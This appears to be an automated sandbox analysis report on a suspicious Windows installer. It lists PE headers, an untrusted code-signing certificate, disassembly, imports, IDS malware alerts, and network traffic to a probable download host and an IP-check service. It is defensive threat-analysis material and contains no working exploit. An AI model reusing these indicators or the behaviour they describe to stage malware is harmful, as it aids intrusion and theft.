Icon Hash:	293cc0c898b02800

Static PE Info

General

Entrypoint:	0x403358
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x52BA66B2 [Wed Dec 25 05:01:38 2013 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	e221f4f7d36469d53810a4b5f9fc8966

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN="Pelsdyrfarmene Jockeyer Pylephlebitis ", O=armeringer, L=Saint-Christophe-la-Couperie, S=Pays de la Loire, C=FR
Signature Validation Error:	A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
Error Number:	-2146762487
Not Before, Not After	20/06/2024 02:58:57 20/06/2027 02:58:57
Subject Chain	CN="Pelsdyrfarmene Jockeyer Pylephlebitis ", O=armeringer, L=Saint-Christophe-la-Couperie, S=Pays de la Loire, C=FR
Version:	3
Thumbprint MD5:	1E59FFE355ED6EAF9B8CBA833F13B719
Thumbprint SHA-1:	DA3F7049218DAB8EDD052DC47667F2358393B114
Thumbprint SHA-256:	FBDFF8867EE1FE06154E5A95C19BADADACECF39D3773C96F783B1D24FFA5B1D9
Serial:	783CA097075C6E03774CDB0586D6E741699D6FCF

Entrypoint Preview

Instruction
sub esp, 000002D4h
push ebx
push ebp
push esi
push edi
push 00000020h
xor ebp, ebp
pop esi
mov dword ptr [esp+14h], ebp
mov dword ptr [esp+10h], 00409230h
mov dword ptr [esp+1Ch], ebp
call dword ptr [00407034h]
push 00008001h
call dword ptr [004070BCh]
push ebp
call dword ptr [004072ACh]
push 00000008h
mov dword ptr [00429298h], eax
call 00007F1478F1836Ch
mov dword ptr [004291E4h], eax
push ebp
lea eax, dword ptr [esp+34h]
push 000002B4h
push eax
push ebp
push 00420690h
call dword ptr [0040717Ch]
push 0040937Ch
push 004281E0h
call 00007F1478F17FD7h
call dword ptr [00407134h]
mov ebx, 00434000h
push eax
push ebx
call 00007F1478F17FC5h
push ebp
call dword ptr [0040710Ch]
cmp word ptr [00434000h], 0022h
mov dword ptr [004291E0h], eax
mov eax, ebx
jne 00007F1478F154BAh
push 00000022h
mov eax, 00434002h
pop esi
push esi
push eax
call 00007F1478F17A16h
push eax
call dword ptr [00407240h]
mov dword ptr [esp+18h], eax
jmp 00007F1478F1557Eh
push 00000020h
pop edx
cmp cx, dx
jne 00007F1478F154B9h
inc eax
inc eax
cmp word ptr [eax], dx
je 00007F1478F154ABh
add word ptr [eax], 0000h

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x7494	0xb4	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x48000	0x55918	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0xd2a18	0x1828
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x7000	0x2b8	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x5e66	0x6000	e8f12472e91b02deb619070e6ee7f1f4	False	0.6566569010416666	data	6.419409887460116	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x7000	0x1354	0x1400	2222fe44ebbadbc32af32dfc9c88e48e	False	0.4306640625	data	5.037511188789184	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x9000	0x202d8	0x600	a5ec1b720d350c6303a7aba8d85072bf	False	0.4733072916666667	data	3.7600484096214832	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x2a000	0x1e000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x48000	0x55918	0x55a00	3d6a8b72f49b497aa2f6e828f36e2071	False	0.6818487682481752	data	6.750089044557724	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x486e8	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 67584	English	United States	0.48516798769667574
RT_ICON	0x58f10	0x104d3	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States	1.0004043671653862
RT_ICON	0x693e8	0x94a8	Device independent bitmap graphic, 96 x 192 x 32, image size 38016	English	United States	0.5461162497372294
RT_ICON	0x72890	0x6b94	PNG image data, 256 x 256, 8-bit colormap, non-interlaced	English	United States	0.995279593318809
RT_ICON	0x79428	0x5488	Device independent bitmap graphic, 72 x 144 x 32, image size 21600	English	United States	0.5835951940850277
RT_ICON	0x7e8b0	0x4c28	Device independent bitmap graphic, 128 x 256 x 8, image size 16384	English	United States	0.46250512925728354
RT_ICON	0x834d8	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16896	English	United States	0.5978979688238073
RT_ICON	0x87700	0x2d6f	PNG image data, 256 x 256, 8-bit colormap, non-interlaced	English	United States	0.9944114865445791
RT_ICON	0x8a470	0x2ca8	Device independent bitmap graphic, 96 x 192 x 8, image size 9216	English	United States	0.5530090972708187
RT_ICON	0x8d118	0x2868	Device independent bitmap graphic, 128 x 256 x 4, image size 8192	English	United States	0.31254833720030933
RT_ICON	0x8f980	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States	0.6519709543568465
RT_ICON	0x91f28	0x1bc8	Device independent bitmap graphic, 72 x 144 x 8, image size 5184	English	United States	0.6259842519685039
RT_ICON	0x93af0	0x16e8	Device independent bitmap graphic, 96 x 192 x 4, image size 4608	English	United States	0.3922237380627558
RT_ICON	0x951d8	0x1628	Device independent bitmap graphic, 64 x 128 x 8, image size 4096	English	United States	0.68688293370945
RT_ICON	0x96800	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States	0.7211538461538461
RT_ICON	0x978a8	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304	English	United States	0.7316098081023454
RT_ICON	0x98750	0xde8	Device independent bitmap graphic, 72 x 144 x 4, image size 2592	English	United States	0.4393258426966292
RT_ICON	0x99538	0xa68	Device independent bitmap graphic, 64 x 128 x 4, image size 2048	English	United States	0.5041291291291291
RT_ICON	0x99fa0	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	English	United States	0.7872950819672131
RT_ICON	0x9a928	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024	English	United States	0.8375451263537906
RT_ICON	0x9b1d0	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576	English	United States	0.875
RT_ICON	0x9b898	0x668	Device independent bitmap graphic, 48 x 96 x 4, image size 1152	English	United States	0.5682926829268292
RT_ICON	0x9bf00	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256	English	United States	0.7890173410404624
RT_ICON	0x9c468	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.8625886524822695
RT_ICON	0x9c8d0	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 512	English	United States	0.7204301075268817
RT_ICON	0x9cbb8	0x1e8	Device independent bitmap graphic, 24 x 48 x 4, image size 288	English	United States	0.805327868852459
RT_ICON	0x9cda0	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128	English	United States	0.8040540540540541
RT_DIALOG	0x9cec8	0x120	data	English	United States	0.5138888888888888
RT_DIALOG	0x9cfe8	0x11c	data	English	United States	0.6056338028169014
RT_DIALOG	0x9d108	0xc4	data	English	United States	0.5918367346938775
RT_DIALOG	0x9d1d0	0x60	data	English	United States	0.7291666666666666
RT_GROUP_ICON	0x9d230	0x180	Targa image data - Map 32 x 1235 x 1 +1	English	United States	0.5442708333333334
RT_VERSION	0x9d3b0	0x260	data	English	United States	0.5263157894736842
RT_MANIFEST	0x9d610	0x305	XML 1.0 document, ASCII text, with very long lines (773), with no line terminators	English	United States	0.5614489003880984

Imports

DLL	Import
KERNEL32.dll	CompareFileTime, SearchPathW, SetFileTime, CloseHandle, GetShortPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, GetFullPathNameW, CreateDirectoryW, Sleep, GetTickCount, CreateFileW, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, SetEnvironmentVariableW, GetWindowsDirectoryW, SetFileAttributesW, ExpandEnvironmentStringsW, SetErrorMode, LoadLibraryW, lstrlenW, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, CreateProcessW, RemoveDirectoryW, lstrcmpiA, GetTempFileNameW, lstrcpyA, lstrcpyW, lstrcatW, GetSystemDirectoryW, GetVersion, GetProcAddress, LoadLibraryA, GetModuleHandleA, GetModuleHandleW, lstrcmpiW, lstrcmpW, WaitForSingleObject, GlobalFree, GlobalAlloc, LoadLibraryExW, GetExitCodeProcess, FreeLibrary, WritePrivateProfileStringW, GetCommandLineW, GetTempPathW, GetPrivateProfileStringW, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, MulDiv, MultiByteToWideChar, WriteFile, lstrlenA, WideCharToMultiByte
USER32.dll	EndDialog, ScreenToClient, GetWindowRect, RegisterClassW, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, wsprintfW, CreateWindowExW, SystemParametersInfoW, AppendMenuW, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, GetDC, SetWindowLongW, LoadImageW, SendMessageTimeoutW, FindWindowExW, EmptyClipboard, OpenClipboard, TrackPopupMenu, EndPaint, ShowWindow, GetDlgItem, IsWindow, SetForegroundWindow
GDI32.dll	SelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll	SHGetSpecialFolderLocation, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW
ADVAPI32.dll	RegCloseKey, RegOpenKeyExW, RegDeleteKeyW, RegDeleteValueW, RegEnumValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
COMCTL32.dll	ImageList_Create, ImageList_AddMasked, ImageList_Destroy
ole32.dll	CoCreateInstance, CoTaskMemFree, OleInitialize, OleUninitialize
VERSION.dll	GetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	Protocol	SID	Signature	Source Port	Dest Port	Source IP	Dest IP
2024-07-25T03:10:19.449026+0200	TCP	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	49707	443	192.168.2.7	108.167.181.251
2024-07-25T03:10:49.744744+0200	TCP	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	49723	443	192.168.2.7	20.189.173.22
2024-07-25T03:10:00.245750+0200	TCP	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	443	49702	52.165.165.26	192.168.2.7
2024-07-25T03:10:38.895890+0200	TCP	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	443	49714	52.165.165.26	192.168.2.7

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 25, 2024 03:10:18.718350887 CEST	49707	443	192.168.2.7	108.167.181.251
Jul 25, 2024 03:10:18.718399048 CEST	443	49707	108.167.181.251	192.168.2.7
Jul 25, 2024 03:10:18.718522072 CEST	49707	443	192.168.2.7	108.167.181.251
Jul 25, 2024 03:10:18.732508898 CEST	49707	443	192.168.2.7	108.167.181.251
Jul 25, 2024 03:10:18.732526064 CEST	443	49707	108.167.181.251	192.168.2.7
Jul 25, 2024 03:10:19.263044119 CEST	443	49707	108.167.181.251	192.168.2.7
Jul 25, 2024 03:10:19.264414072 CEST	49707	443	192.168.2.7	108.167.181.251
Jul 25, 2024 03:10:19.321981907 CEST	49707	443	192.168.2.7	108.167.181.251
Jul 25, 2024 03:10:19.322002888 CEST	443	49707	108.167.181.251	192.168.2.7
Jul 25, 2024 03:10:19.322953939 CEST	443	49707	108.167.181.251	192.168.2.7
Jul 25, 2024 03:10:19.323040962 CEST	49707	443	192.168.2.7	108.167.181.251
Jul 25, 2024 03:10:19.327538013 CEST	49707	443	192.168.2.7	108.167.181.251
Jul 25, 2024 03:10:19.372499943 CEST	443	49707	108.167.181.251	192.168.2.7
Jul 25, 2024 03:10:19.449028969 CEST	443	49707	108.167.181.251	192.168.2.7
Jul 25, 2024 03:10:19.449059010 CEST	443	49707	108.167.181.251	192.168.2.7
Jul 25, 2024 03:10:19.449168921 CEST	49707	443	192.168.2.7	108.167.181.251
Jul 25, 2024 03:10:19.449183941 CEST	443	49707	108.167.181.251	192.168.2.7
Jul 25, 2024 03:10:19.449223995 CEST	49707	443	192.168.2.7	108.167.181.251
Jul 25, 2024 03:10:19.467927933 CEST	443	49707	108.167.181.251	192.168.2.7
Jul 25, 2024 03:10:19.468009949 CEST	49707	443	192.168.2.7	108.167.181.251
Jul 25, 2024 03:10:19.539781094 CEST	443	49707	108.167.181.251	192.168.2.7
Jul 25, 2024 03:10:19.539942026 CEST	49707	443	192.168.2.7	108.167.181.251
Jul 25, 2024 03:10:19.541171074 CEST	443	49707	108.167.181.251	192.168.2.7
Jul 25, 2024 03:10:19.541261911 CEST	49707	443	192.168.2.7	108.167.181.251
Jul 25, 2024 03:10:19.541646957 CEST	443	49707	108.167.181.251	192.168.2.7
Jul 25, 2024 03:10:19.541723967 CEST	49707	443	192.168.2.7	108.167.181.251
Jul 25, 2024 03:10:19.559595108 CEST	443	49707	108.167.181.251	192.168.2.7
Jul 25, 2024 03:10:19.559859037 CEST	49707	443	192.168.2.7	108.167.181.251
Jul 25, 2024 03:10:19.631063938 CEST	443	49707	108.167.181.251	192.168.2.7
Jul 25, 2024 03:10:19.631160975 CEST	49707	443	192.168.2.7	108.167.181.251
Jul 25, 2024 03:10:19.631187916 CEST	443	49707	108.167.181.251	192.168.2.7
Jul 25, 2024 03:10:19.631254911 CEST	49707	443	192.168.2.7	108.167.181.251
Jul 25, 2024 03:10:19.631769896 CEST	443	49707	108.167.181.251	192.168.2.7
Jul 25, 2024 03:10:19.631848097 CEST	49707	443	192.168.2.7	108.167.181.251
Jul 25, 2024 03:10:19.632684946 CEST	443	49707	108.167.181.251	192.168.2.7
Jul 25, 2024 03:10:19.632764101 CEST	49707	443	192.168.2.7	108.167.181.251
Jul 25, 2024 03:10:19.633542061 CEST	443	49707	108.167.181.251	192.168.2.7
Jul 25, 2024 03:10:19.633645058 CEST	49707	443	192.168.2.7	108.167.181.251
Jul 25, 2024 03:10:19.634495020 CEST	443	49707	108.167.181.251	192.168.2.7
Jul 25, 2024 03:10:19.634565115 CEST	49707	443	192.168.2.7	108.167.181.251
Jul 25, 2024 03:10:19.650768042 CEST	443	49707	108.167.181.251	192.168.2.7
Jul 25, 2024 03:10:19.650829077 CEST	443	49707	108.167.181.251	192.168.2.7
Jul 25, 2024 03:10:19.650856018 CEST	49707	443	192.168.2.7	108.167.181.251
Jul 25, 2024 03:10:19.650868893 CEST	443	49707	108.167.181.251	192.168.2.7
Jul 25, 2024 03:10:19.650942087 CEST	49707	443	192.168.2.7	108.167.181.251
Jul 25, 2024 03:10:19.722794056 CEST	443	49707	108.167.181.251	192.168.2.7
Jul 25, 2024 03:10:19.722959042 CEST	443	49707	108.167.181.251	192.168.2.7
Jul 25, 2024 03:10:19.723114967 CEST	49707	443	192.168.2.7	108.167.181.251
Jul 25, 2024 03:10:19.723114967 CEST	49707	443	192.168.2.7	108.167.181.251
Jul 25, 2024 03:10:19.723141909 CEST	443	49707	108.167.181.251	192.168.2.7
Jul 25, 2024 03:10:19.723155975 CEST	443	49707	108.167.181.251	192.168.2.7
Jul 25, 2024 03:10:19.723225117 CEST	49707	443	192.168.2.7	108.167.181.251
Jul 25, 2024 03:10:19.723231077 CEST	443	49707	108.167.181.251	192.168.2.7
Jul 25, 2024 03:10:19.723272085 CEST	49707	443	192.168.2.7	108.167.181.251
Jul 25, 2024 03:10:19.723453045 CEST	443	49707	108.167.181.251	192.168.2.7
Jul 25, 2024 03:10:19.723524094 CEST	49707	443	192.168.2.7	108.167.181.251
Jul 25, 2024 03:10:19.724145889 CEST	443	49707	108.167.181.251	192.168.2.7
Jul 25, 2024 03:10:19.724250078 CEST	49707	443	192.168.2.7	108.167.181.251
Jul 25, 2024 03:10:19.724369049 CEST	443	49707	108.167.181.251	192.168.2.7
Jul 25, 2024 03:10:19.724441051 CEST	49707	443	192.168.2.7	108.167.181.251
Jul 25, 2024 03:10:19.725084066 CEST	443	49707	108.167.181.251	192.168.2.7
Jul 25, 2024 03:10:19.725200891 CEST	49707	443	192.168.2.7	108.167.181.251
Jul 25, 2024 03:10:19.725366116 CEST	443	49707	108.167.181.251	192.168.2.7
Jul 25, 2024 03:10:19.725436926 CEST	49707	443	192.168.2.7	108.167.181.251
Jul 25, 2024 03:10:19.726063967 CEST	443	49707	108.167.181.251	192.168.2.7
Jul 25, 2024 03:10:19.726142883 CEST	49707	443	192.168.2.7	108.167.181.251
Jul 25, 2024 03:10:19.726296902 CEST	443	49707	108.167.181.251	192.168.2.7
Jul 25, 2024 03:10:19.726360083 CEST	49707	443	192.168.2.7	108.167.181.251
Jul 25, 2024 03:10:19.727010012 CEST	443	49707	108.167.181.251	192.168.2.7
Jul 25, 2024 03:10:19.727097034 CEST	49707	443	192.168.2.7	108.167.181.251
Jul 25, 2024 03:10:19.744792938 CEST	443	49707	108.167.181.251	192.168.2.7
Jul 25, 2024 03:10:19.744851112 CEST	443	49707	108.167.181.251	192.168.2.7
Jul 25, 2024 03:10:19.744911909 CEST	443	49707	108.167.181.251	192.168.2.7
Jul 25, 2024 03:10:19.744961023 CEST	49707	443	192.168.2.7	108.167.181.251
Jul 25, 2024 03:10:19.744985104 CEST	443	49707	108.167.181.251	192.168.2.7
Jul 25, 2024 03:10:19.745122910 CEST	49707	443	192.168.2.7	108.167.181.251
Jul 25, 2024 03:10:19.745122910 CEST	49707	443	192.168.2.7	108.167.181.251
Jul 25, 2024 03:10:19.777291059 CEST	443	49707	108.167.181.251	192.168.2.7
Jul 25, 2024 03:10:19.777584076 CEST	49707	443	192.168.2.7	108.167.181.251
Jul 25, 2024 03:10:19.814467907 CEST	443	49707	108.167.181.251	192.168.2.7
Jul 25, 2024 03:10:19.814623117 CEST	49707	443	192.168.2.7	108.167.181.251
Jul 25, 2024 03:10:19.814903975 CEST	443	49707	108.167.181.251	192.168.2.7
Jul 25, 2024 03:10:19.814986944 CEST	49707	443	192.168.2.7	108.167.181.251
Jul 25, 2024 03:10:19.815254927 CEST	443	49707	108.167.181.251	192.168.2.7
Jul 25, 2024 03:10:19.815339088 CEST	49707	443	192.168.2.7	108.167.181.251
Jul 25, 2024 03:10:19.815376997 CEST	443	49707	108.167.181.251	192.168.2.7
Jul 25, 2024 03:10:19.815459013 CEST	49707	443	192.168.2.7	108.167.181.251
Jul 25, 2024 03:10:19.815743923 CEST	443	49707	108.167.181.251	192.168.2.7
Jul 25, 2024 03:10:19.815821886 CEST	49707	443	192.168.2.7	108.167.181.251
Jul 25, 2024 03:10:19.815831900 CEST	443	49707	108.167.181.251	192.168.2.7
Jul 25, 2024 03:10:19.815892935 CEST	49707	443	192.168.2.7	108.167.181.251
Jul 25, 2024 03:10:19.815902948 CEST	443	49707	108.167.181.251	192.168.2.7
Jul 25, 2024 03:10:19.815959930 CEST	49707	443	192.168.2.7	108.167.181.251
Jul 25, 2024 03:10:19.815974951 CEST	443	49707	108.167.181.251	192.168.2.7
Jul 25, 2024 03:10:19.816031933 CEST	49707	443	192.168.2.7	108.167.181.251
Jul 25, 2024 03:10:19.831526041 CEST	49707	443	192.168.2.7	108.167.181.251
Jul 25, 2024 03:10:19.831547976 CEST	443	49707	108.167.181.251	192.168.2.7
Jul 25, 2024 03:10:19.831558943 CEST	49707	443	192.168.2.7	108.167.181.251
Jul 25, 2024 03:10:19.831621885 CEST	49707	443	192.168.2.7	108.167.181.251
Jul 25, 2024 03:10:20.143165112 CEST	49708	80	192.168.2.7	158.101.44.242
Jul 25, 2024 03:10:20.148875952 CEST	80	49708	158.101.44.242	192.168.2.7
Jul 25, 2024 03:10:20.149185896 CEST	49708	80	192.168.2.7	158.101.44.242
Jul 25, 2024 03:10:20.149610996 CEST	49708	80	192.168.2.7	158.101.44.242
Jul 25, 2024 03:10:20.155486107 CEST	80	49708	158.101.44.242	192.168.2.7
Jul 25, 2024 03:10:23.989202976 CEST	80	49708	158.101.44.242	192.168.2.7
Jul 25, 2024 03:10:23.992830038 CEST	80	49708	158.101.44.242	192.168.2.7
Jul 25, 2024 03:10:23.992885113 CEST	49708	80	192.168.2.7	158.101.44.242
Jul 25, 2024 03:10:51.720510960 CEST	49708	80	192.168.2.7	158.101.44.242

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 25, 2024 03:10:18.487117052 CEST	54558	53	192.168.2.7	1.1.1.1
Jul 25, 2024 03:10:18.710628986 CEST	53	54558	1.1.1.1	192.168.2.7
Jul 25, 2024 03:10:20.128070116 CEST	62958	53	192.168.2.7	1.1.1.1
Jul 25, 2024 03:10:20.135034084 CEST	53	62958	1.1.1.1	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jul 25, 2024 03:10:18.487117052 CEST	192.168.2.7	1.1.1.1	0xc85a	Standard query (0)	www.reap.skyestates.com.mt	A (IP address)	IN (0x0001)	false
Jul 25, 2024 03:10:20.128070116 CEST	192.168.2.7	1.1.1.1	0x5af8	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jul 25, 2024 03:10:18.710628986 CEST	1.1.1.1	192.168.2.7	0xc85a	No error (0)	www.reap.skyestates.com.mt		108.167.181.251	A (IP address)	IN (0x0001)	false
Jul 25, 2024 03:10:20.135034084 CEST	1.1.1.1	192.168.2.7	0x5af8	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Jul 25, 2024 03:10:20.135034084 CEST	1.1.1.1	192.168.2.7	0x5af8	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Jul 25, 2024 03:10:20.135034084 CEST	1.1.1.1	192.168.2.7	0x5af8	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Jul 25, 2024 03:10:20.135034084 CEST	1.1.1.1	192.168.2.7	0x5af8	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Jul 25, 2024 03:10:20.135034084 CEST	1.1.1.1	192.168.2.7	0x5af8	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Jul 25, 2024 03:10:20.135034084 CEST	1.1.1.1	192.168.2.7	0x5af8	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.reap.skyestates.com.mt

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49708	158.101.44.242	80	7476	C:\Program Files (x86)\Windows Mail\wab.exe

Timestamp	Bytes transferred	Direction	Data
Jul 25, 2024 03:10:20.149610996 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jul 25, 2024 03:10:23.989202976 CEST	745	IN	HTTP/1.1 504 Gateway Time-out Date: Thu, 25 Jul 2024 01:10:23 GMT Content-Type: text/html Content-Length: 557 Connection: keep-alive X-Request-ID: 9d2908d779cb431c5f7588cf3243cca9 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c [TRUNCATED] Data Ascii: <html><head><title>504 Gateway Time-out</title></head><body><center><h1>504 Gateway Time-out</h1></center><hr><center></center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Jul 25, 2024 03:10:23.992830038 CEST	745	IN	HTTP/1.1 504 Gateway Time-out Date: Thu, 25 Jul 2024 01:10:23 GMT Content-Type: text/html Content-Length: 557 Connection: keep-alive X-Request-ID: 9d2908d779cb431c5f7588cf3243cca9 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 